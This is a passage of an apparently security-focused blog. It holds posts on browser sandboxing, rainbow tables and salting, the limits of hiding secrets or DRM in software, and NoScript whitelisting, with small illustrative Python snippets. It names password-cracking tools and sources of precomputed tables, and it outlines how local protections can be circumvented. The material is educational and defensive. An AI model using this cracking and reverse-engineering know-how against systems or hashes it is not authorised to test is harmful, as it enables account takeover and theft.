  1. The address bar. You might seriously think, wait, that can’t be a problem, can it? But if the browser does not correctly pass the right thing to the “page getting” bit, or the “page getting” bit doesn’t error when it gets bad input, you have a problem, because links all over the internet are going to break your browser. Believe it or not, in the early days of Internet Explorer, this was actually an issue that could lead you to believe you were on a different site from the one you were actually on. See here. These days, this particular attack vector is more of a phishing/spoofing style problem than browser manufacturers getting it wrong.

  2. Content parsers. For content parsing I mean all the bits that make it up – html, xhtml, javascript, css. If there are bugs in these, the best case scenario is really that the browser crashes. However, you might be able to get the browser to do something it shouldn’t with a specially crafted web page, javascript or CSS file. Technically speaking, the browser should prevent the javascript it is executing from doing anything too malicious to your system. That’s the idea. The browser will also prevent said javascript from doing anything too malicious to other pages too. A full discussion of web vulnerabilities like this is a blog post in itself, really so we won’t cover it here.

  3. Extensions in Javascript/whatever the browser uses. Again, this comes down to whether there are vulnerabilities in the parser/enforcement rules. Otherwise, an extension of this nature will have more “power” than in-page Javascript, but still won’t be able to do too much “bad stuff”.

  4. Binary formats in the rendering engine. Clearly, a web page is more than just parseable programming-language like things – it’s also images in a whole variety of complicated formats. A bug in these processors might be exploitable; given they’re written as native functions inside the browser, or as shared libraries the browser uses, the responsibility for access control is at the OS level and so a renderer that is persuaded to do something bad could do anything the user running the process can do.

  5. Extensions (Firefox plugins)/File format handlers. These enable the browser to do things it can’t do in and of itself and are often developed externally to the core “browsing” part. Examples of this are embedding adobe reader in web pages and displaying flash applications. Again, these have decoders or parsers, so bugs in these can persuade the plugin to ask the operating system to do what we want it to do, rather than what it should.

You might wonder if 4 and 5 really should be subject to the same protections afforded to the javascript part. Well, the interesting thing is, that is part of the solution, but you can’t really do it in Javascript, because compared to having direct access to memory and the operating system, it would be much slower. Clearly, that’s a problem for video decoding and really heavy duty graphical applications such as flash is often used for, so plugins are and were the solution.

Ok, ok, tell me, what’s the worst the big bad hacker can do?

Depends. There are two really lucrative possible exploits from bugs of this sort: either arbitrary code execution (do what you want) or drive-by downloading (which is basically, send code that downloads something, then run it). In and of itself, the fact that you’re browsing as a restricted user and not an administrator (right?) means the damage the attacker can do is limited to what your user can do. That could be fairly critical, including infecting all your files with malware, deleting stuff, whatever it is they want. You might then unwittingly pass on the infection.

The real problem, however, is that the attacker can use this downloaded code as a launch platform to attack more important parts. A full discussion of botnets, rootkits and persistent malware really ought to also be a separate blog post, but let’s just say the upshot is your computer could be taking part in attacks on other computers orchestrated by criminal gangs. Serious then.

Oh my unicorns, why haven’t you developers fixed this?

First up, no piece of code is entirely perfect. The problem with large software projects is that they become almost too complicated for one person to understand every part and every change that is going on. So the project is split up with maintainers for each part and coding standards, rules, guidelines, tools you must run and that must pass, tests you must run and must pass etc. In my experience, this improves things, but no matter how much you throw at it in terms of management, you’re still dealing with humans writing programs. So mistakes happen.

However, our increasing reliance on the web has got armies of security people of the friendly, helpful sort trying to fix the problem, including the people who build browsers. I went to great lengths to discuss threads and processes for a good reason, because now I can discuss what Google Chrome tries to do.

Ok…

So as I said, the traditional way you think about building an application when you want to do more than one thing at once is to use threads. You can store your data in memory and any thread can get it (I’m totally ignoring a whole series of problems you can encounter with this for simplicity, but if you’re a budding programmer, read up on concurrency before just trying this) reasonably easily. So when you load a page and run a download, both can happen at once and the operating system makes it look like they’re both happening at the same time.

Any bugs from 2-5, however, can affect this whole process. There’s nothing to stop a plugin waltzing over and modifying the memory of the parser, or totally replacing it, or well, anything. Also, a crash in a single thread in a program tends to bring the whole thing down, so from a stability point of view, it can also be a problem. Here’s a nice piece of ascii art:

|-----------------------------------------------------------------------|
| Process no 3412  Thread/parsing security.blogoverflow.com             |
|  Big pile of     Thread/rendering PNG                                 |
|  shared memory   Thread/running flash plugin - video from youtube     |
|-----------------------------------------------------------------------|
So, all that code is in the same space (memory address) as each other, basically. Simple enough.

The Chrome developers looked at this and decided it was a really bad idea. For starters, there’s the stability problem – plugins do crash fairly frequently, especially if you’ve ever used the 64-bit flash plugin for linux. That might take the whole process down, or it might cause something else to happen, who knows.

The Chrome model executes sub-processes for each site to be rendered (displayed) and for every plugin in use, like this:

   |--------------------------|       |-----------------------------------|
   | Master chrome            |-------| Rendering process for security....|
   | process. User interface  |       |-----------------------------------|
   | May also use threads     |
   |--------------------------|-------|-----------------------------------|
                |                     | Rendering process for somesite... |
   |--------------------------|       |-----------------------------------|
   | Flash plugin process     |
   |--------------------------|
So now what happens is the master process becomes only the user interface. Child processes actually do the work, but if they get bad input, they die and don’t bring the whole browser down.

Now, this also helps solve the security problem to some extent. Those sub-processes cannot alter each other’s memory easily at all, so there’s not much for them to exploit. In order to get anything done, they have to use IPC – interprocess communication, to talk to the master process and ask for certain things to happen. So now the master process can do some filtering based on a policy of who should be able to access what. Child processes are then denied access to things they can’t have, by the master process.

But, can’t sub processes just ask the operating system directly? Well, not on Windows for certain. When the master process creates the child process, it also asks Windows for a new security “level” if you like (token is the technical term) and creates the process in that level, which is highly restricted. So the child process will actually be denied certain things by the operating system unless it needs them, which is harder to do on a single process where parts of it do need unrestricted access.

In defence of the Windows engineers, this functionality (security tokens) has been part of the Windows API for a while; it’s just that developers haven’t really used it. Also, it applies to threads too, although there remains a problem with access to the process’s memory.

Great! I can switch to Chrome and all will be well!

Hold up a second… yes, this is an excellent concept, and hopefully other browser writers will start looking at integrating OS security into their browsers too. However, any solution like this will, under certain conditions, be circumventable; it’s just a matter of finding a scenario. Also, Chrome or any other browser cannot defend you from yourself – some basic rules still apply. They are, briefly: do not open dodgy content, and do keep your system/antivirus/firewall up to date.

Right, so what’s the best browser?

I can’t answer that, nor will I attempt to try. All browser manufacturers know that “security” bugs happen and all of them release fixes, as do third parties. A discussion on which has the best architecture is not a simple one – we’ve outlined the theory here, but how it is implemented will really determine whether it works – the devil is in the detail, as they say.

So that concludes our high level discussion of the various security issues with browsers, plugins and drive by downloads. However, I would really like to stress there is a whole other area of security which you might broadly call “web application” security, which concerns in part what the browser allows to happen, but also encompasses servers and databases and many other things. We’ve covered a small corner of the various problems today; hopefully some of our resident web people will over time cover some of the interesting things that happen in building complex web sites. Here is a list of all the questions here tagged web-browser.

QotW #9: What are Rainbow Tables and how are they used?

2011-09-09 by roryalsop. 0 comments

This week’s question, asked by @AviD, turned out to have subtle implications that even experienced security professionals may not have been aware of.

A quick bit of background:

With all the furore about passwords, most companies and individuals know they should have strong passwords in place, and many use system-enforced password complexity rules (e.g. 8 characters, with at least 1 number and 1 special character) – but how can a company actually audit password strength?

John the Ripper was a pretty good tool for this – it would brute force or use a dictionary attack on password hashes, and if it broke them quickly they were weak. If they lasted longer they were stronger (broadly speaking).

So far so good, but what if you are a security professional emulating an attacker to assess controls? You could run the brute forcer for a while, but this isn’t what an attacker will do – maths has provided much faster ways to get passwords:

Hash Tables and Rainbow Tables

Hash Tables are exactly as the name sounds – tables of hashes generated from every possible password in the space you want, for example a table of all DES crypt hashes for unsalted alphanumeric passwords 8 characters or less, along with the password. If you manage to get hold of the password hashes from the target you simply match them with the hashes in this table, and if the passwords are in the table you win – the password is there (excluding the relatively small possibility of hash collisions – which for most security purposes is irrelevant as you can still use the wrong password if its hash matches the correct one). The main problem with Hash tables is that they get very big very quickly, which means you need a lot of storage space, and an efficient table lookup over this space.
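As a minimal sketch of the precomputed-table idea (Python, unsalted MD5, and a toy password space purely for illustration):

import hashlib

# Build the table once: hash -> password, for every password in the chosen space.
candidates = ["password", "letmein", "qwerty123", "hunter2"]    # tiny toy space
table = {hashlib.md5(p.encode()).hexdigest(): p for p in candidates}

# "Cracking" a stolen hash is then just a lookup, not a brute-force run.
stolen_hash = hashlib.md5(b"hunter2").hexdigest()
print(table.get(stolen_hash))        # hunter2

For a realistic password space the table explodes to terabytes, which is exactly the storage problem described above.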

Which is where Rainbow Tables come in. @Crunge‘s answer provides excellent detail in relatively simple language to describe the combination of hashing function, reduction function and the mechanism by which chains of these can lead to an efficient way to search for passwords that are longer or more complex than those that lend themselves well to a hash table.

In fact @Crunge’s conclusion is:

Hash tables are good for common passwords, Rainbow Tables are good for tough passwords. The best approach would be to recover as many passwords as possible using hash tables and/or conventional cracking with a dictionary of the top N passwords. For those that remain, use Rainbow Tables.

@Mark Davidson points us in the direction of resources. You can either generate the rainbow tables yourself using an application like RainbowCrack, or you can download them from sources like The Shmoo Group, the Free Rainbow Tables project website, the Ophcrack project and many other places, depending on what type of hashes you need tables for.

Now from a defence perspective, what do you need to know? 

Two things:

Longer passwords are still stronger against attack, but be aware that if they are too long then users may not be able to remember them. (Correct Horse Battery Staple!)

Salt and Pepper – @Rory McCune describes salt and pepper in this answer:

A simple and effective defence that most password hashing functions provide now is salting – the addition of a per-user “salt” value stored in the database along with the hashed password. It isn’t intended to be secret, but is used to slow down the brute force process and to make rainbow tables impractical to use. Another add-on is what is called a “pepper” value. This is just another random string, but it is the same for all users and is stored with the application code as opposed to in the database. The theory here is that in some circumstances the database may be compromised but the application code is not, and in those cases this could improve the security. It does, however, introduce problems if there are multiple applications using the same password database.
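A small sketch of what per-user salting looks like in practice (Python standard library; the iteration count and other choices are illustrative, not from Rory’s answer):

import hashlib, hmac, os

def hash_password(password: bytes):
    salt = os.urandom(16)                          # per-user random salt, stored with the hash
    digest = hashlib.pbkdf2_hmac("sha256", password, salt, 100_000)
    return salt, digest

def verify(password: bytes, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password, salt, 100_000)
    return hmac.compare_digest(candidate, digest)

salt, digest = hash_password(b"correct horse battery staple")
print(verify(b"correct horse battery staple", salt, digest))    # True
print(verify(b"Tr0ub4dor&3", salt, digest))                     # False

Because every user gets a different salt, a precomputed table would have to be rebuilt per user, and the iterated hash slows down any brute-force run as well.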

Storing secrets in software

2011-09-06 by ninefingers. 0 comments

This question comes up on Stack Overflow and IT Security relatively regularly, and goes along one of these lines:

  1. I have a symmetric encryption key I would like to store in my application so attackers can’t find it.
  2. I have an asymmetric encryption key I would like to store in my application so attackers can’t find it.
  3. I would like to store authentication details of some kind in my application so attackers can’t find them.
  4. I have developed an algorithm. How do I make it so attackers can never find it?
  5. I am selling commercial music. I need to make it so The Nasty Pirates can’t decode it.

Firstly, a review of what cryptography is at heart: encryption and decryption are all about sending data over untrusted networks, or storing data in untrusted places, such that only the intended recipient can read that information. This gives you confidentiality; cryptography as a whole also aims to provide integrity checks through signatures and message digests. Cryptography is, however, often confused with access control, in which it so often plays a part. Cryptography ceases to be able to protect you when you decide to put the key and the encrypted data together – at this point, the data has reached its destination, the trusted place. The expectation that cryptography can protect data once it is decrypted is similar to the expectation that a locked door will protect your house if you leave the key under the mat. The act of accessing the key and decrypting the data (and even encrypting it) is a weak link in the chain: it assumes the system you’re performing these actions on guarantees your confidentiality and integrity – it assumes that system is trusted. Reading the argument presented here, our resident cryptographer provided the following explanation: “Encryption does not create confidentiality, it just concentrates confidentiality into the key. Presumably, it is easier to keep confidential a small key of fixed size, and the key uniform structure allows for the key confidentiality to be measured. Yet you have to start confidentiality at something. Once the key is known, confidentiality has left.”

All of the above questions are really forms of the same thing: how do I safely decode some encrypted data on an untrusted system, without that data being intercepted? In other words, you are now asking cryptography to guarantee the security of that information even after you have decrypted it. This is not possible. The problem then becomes one of ensuring that the system in question will maintain confidentiality and integrity for you.

The answer, then, is to create a system which acts as the recipient such that data can be decoded in it and never needs to be transferred outside of it. I’ll call it the black box. The rest of this blog post will be about looking for the black box setup.

  1. We will begin with the idea that we want to write a program which stores something securely whilst preventing the user from accessing that information. The first place people want to put the secret is in their source code, which is fine except that the compiled program can be disassembled (see the sketch after this list). Yes, there are ways to make this more difficult, but it is not possible to prevent. The same goes for hiding or stashing files around the system, since a cursory analysis with the right tools will tell you exactly where to look. I should add that disassembly prevention measures tend to make your software less stable and/or portable.
  2. The next option is to coerce the system into helping you hide your information. In any form, this will essentially look like a rootkit. This is dangerous: you may well have your application categorised as malware, for starters, but more importantly it is very easy at this stage to introduce extra vulnerabilities into the system you have just hooked. You could also crash your customer's system, which is "not cool" whichever way you look at it. Finally, whilst rootkits are difficult to remove, comparing a live listing of files with an offline one is not, so rootkits can be found and their installation prevented. In fact, a cunning reverse engineer might replace your rootkit with their own equivalent, stealing the information you send it. Handy.
  3. Stage 3 is one for the Slashdot front page: the operating system vendor is complicit in helping you. Unless you are a music giant, I suspect this is probably not an option for you. A complicit operating system is harder to circumvent, but entirely possible. All you need is access to ring 0 (for people not familiar with the term, ring 0 is the mode in which the processor will not stop you lifting any restrictions placed upon memory or code: you can ignore read-only page checks, rewrite chunks of kernel memory, whatever you want to do). Depending on the system this might be difficult to achieve, but it certainly is not impossible. Another route to this stage is to compromise the boot process, passing the OS the correct validation codes if it checks anything. Clearly this stage is difficult to pull off and requires time and effort, but it can be done.
  4. So, OS security not enough? Hardware, then. At this stage you actually have a real black box (or chip) somewhere on the computer. Of course, if the decoded output is handed back to the OS, see stages 1-3. So now your black box needs to talk to all your other hardware, like your monitor or speaker system – and those need to be intercept-proof too, since maybe they cannot be trusted either and are really writing the decoded data straight back to the hard disk. This might sound far-fetched, but High-bandwidth Digital Content Protection (wikipedia) aims to provide exactly this kind of protection.
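Coming back to point 1: a compiled binary gives up embedded secrets with almost no effort. The snippet below is a rough Python stand-in for the Unix strings tool – purely illustrative, and the minimum length is an arbitrary choice – but any constant key or password baked into an executable will typically appear in its output:

    import re
    import sys

    # Rough stand-in for the Unix `strings` tool: pull printable ASCII runs out of a
    # binary file. A key or password compiled into the executable usually shows up here.
    def printable_strings(path, min_len=8):
        with open(path, "rb") as f:
            data = f.read()
        return re.findall(rb"[ -~]{%d,}" % min_len, data)

    if __name__ == "__main__":
        for s in printable_strings(sys.argv[1]):
            print(s.decode("ascii"))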

The move/counter-move sequence carries on – so what is to stop a hardware engineer taking your box apart? Self-destructing hardware? OK, but the content must eventually be displayed on a monitor, sending light waves and electrical signals out to be captured.

What does this mean for software on the PC?

  1. You cannot store passwords, encryption keys etc in your code, or anywhere on the system. The only way around that is to allow for user input and aim to prevent interception, which could in itself be difficult.
  2. License keys do not work either, for the same reason.
  3. Nor does obfuscating or encrypting your code: it has to be returned to an executable form at some point, and anything that runs can be reverse engineered.

However, there is a case where hardware-complicit defences are perfectly possible and may well be encouraged: where the hardware and software come together as a single product. There are many scenarios in which this happens, the most obvious being the mobile phone. A mobile phone is, relatively speaking, hard to take apart and put back together again whole (unless you're a mobile phone engineer), so it is possible to have hardware-based security work reasonably effectively. Smart cards with on-board cryptographic functions likewise ensure the keys are exceptionally hard to steal. In the case of smart cards, the boundary problem still exists in terms of transferring the decrypted data back to the untrusted system, but on a mobile phone-like device it would be entirely feasible not to route that information through the OS itself and instead play it directly to the screen, isolating those buffers from the "untrusted" sections of the OS. However, let's leave that idea here; trusted platforms are a blog post for another day.

Is there a case for devices capable of such secure display? Absolutely. Want to securely read data on a financial transaction, or have a trusted communication channel with your bank? Upping the bar like this definitely helps protect against malware and other interception threats. However, the most common use case appears to be “how do I defend my asset in an untrusted environment in order to enforce my desired price model?” Which brings me full circle – that is not the problem set cryptography solves.

When people say secure, they often mean "impossible for the bad guy, possible for me". That is almost never the case. Clearly, looking at the above, the number of people skilled enough to counter stage 3 is actually pretty small, so you will achieve part of this aim: "hard for the bad guy, easy-ish for me". When people say secure, they also frequently mean only technical security measures. Security is more than that – that is why we have policies, community, law, education, awareness and so on. Going as far as stages 2 and 3 reduces the number of people capable of subverting your protection system to the point where legal action becomes feasible.

However, I think we still have a narrow definition of security in the first place. If you are delivering content or software, the number of issues a customer is likely to run into grows dramatically as you move from stage 1 through to stage 4. Does your customer really want to be told that you do not support Windows 8 yet? Or that they cannot use their favourite media player for your content? Or that they need to upgrade their BigMediaCorpSatelliteTVBox because you altered the algorithms? Or that they have been locked out of that Abba Specials subscription channel they paid for because of a hardware fault, or… Security here is not just about protecting your content, it is about protecting your business. Will the cost of securing the content using any of stages 1-4 make up for the potential revenue you could have made if everyone bought a copy legally? Or will the number of legitimate sales simply go down as consumers react to all those technical barriers shattering their plug-and-play expectations? I do not have any numbers on that one, but I am willing to bet the net result of adding this extra "security" is a loss.

Security needs to be appropriate to the risk of the situation presented, having been fully evaluated from all angles. The general consensus is that DRM is an excessive protection measure given the risks involved – indeed, a very simple solution is to make software/music/whatever at the right price point and value such that the vast majority of users buy it, and allow for the fact that some people will pirate/steal/make unauthorised use of it. In certain situations, providing a value add around the product can make the difference (some companies selling open source software generate their entire revenue using this model), and even persuade users of illegal copies to buy a licence in order to gain access to these services (e.g. support, upgrades).

 

QotW #8: how to determine what to whitelist with NoScript?

2011-09-02 by ninefingers. 2 comments

Our question of the week this week was asked by Iszi, who wanted to know how exactly we should determine what to trust when employing NoScript. In the question itself Iszi raises some valid points: how does somebody know, other than by trial and error, whether scripts from a given site or a third-party site are trustworthy? How does a user determine which parts of the JavaScript are responsible for which bits of functionality? And how do we do this without exposing ourselves to the risks of such scripts?

Richard Gadsden suggests that one way to approach a solution is for each site to declare what JavaScript it directly controls. He notes that such a mechanism could trivially be subverted if the responding page lists any and all JavaScript as "owned" by the site in question.

Such resource-based mechanisms have been tried and implemented before, albeit for a different problem domain (preventing XSS attacks). Cross-Origin Resource Sharing (W3C, Wikipedia) attempts to do just that by vetting incoming third party requests. However, like HTML-based lists, it does not work well when the trusted end users are “everyone”, i.e. a public web service.
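For readers who have not met CORS, the mechanism amounts to the server declaring which origins may read its responses from a script. Here is a minimal sketch using Python's standard library – the origin, port and payload are illustrative assumptions, not taken from any of the answers:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class CORSHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            # Only scripts running on this one origin may read the response cross-site;
            # a wildcard "*" would extend that trust to every site on the web.
            self.send_header("Access-Control-Allow-Origin", "https://trusted.example.com")
            self.send_header("Content-Type", "application/json")
            self.end_headers()
            self.wfile.write(b'{"status": "ok"}')

    HTTPServer(("", 8000), CORSHandler).serve_forever()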

Zuly Gonzalez discusses a potential solution her startup has been working on – running scripts on a disposable VM. Zuly makes some good points: even with a whitelisted domain, you cannot necessarily trust each and every script that is added to the domain; moreover, once you have made your trust decision, a simple whitelist is not enough unless you re-vet the scripts.

Zuly’s company – if you’re interested, check out her answer – runs scripts on a disposable virtual machine rather than on your computer. Disclaimer: we haven’t tested it, but the premise sounds good.

Clearly, however, such a solution is not available to everyone. Karrax suggested that the best option might be to install plugins such as McAfee SiteAdvisor to help inform users as to which domains they should be trusting. He notes that the NoScript team are beginning to integrate such functionality into the user interface of NoScript itself. This is a feature I did not know I had, so I tried it. According to the trial page, at the time of writing the service is experimental, but all of the linked-to sites provide a lot of information about the domain name and whether to trust it.

This is an area with no single solution yet, and these various solutions are in continuous development. Let’s see what the future holds.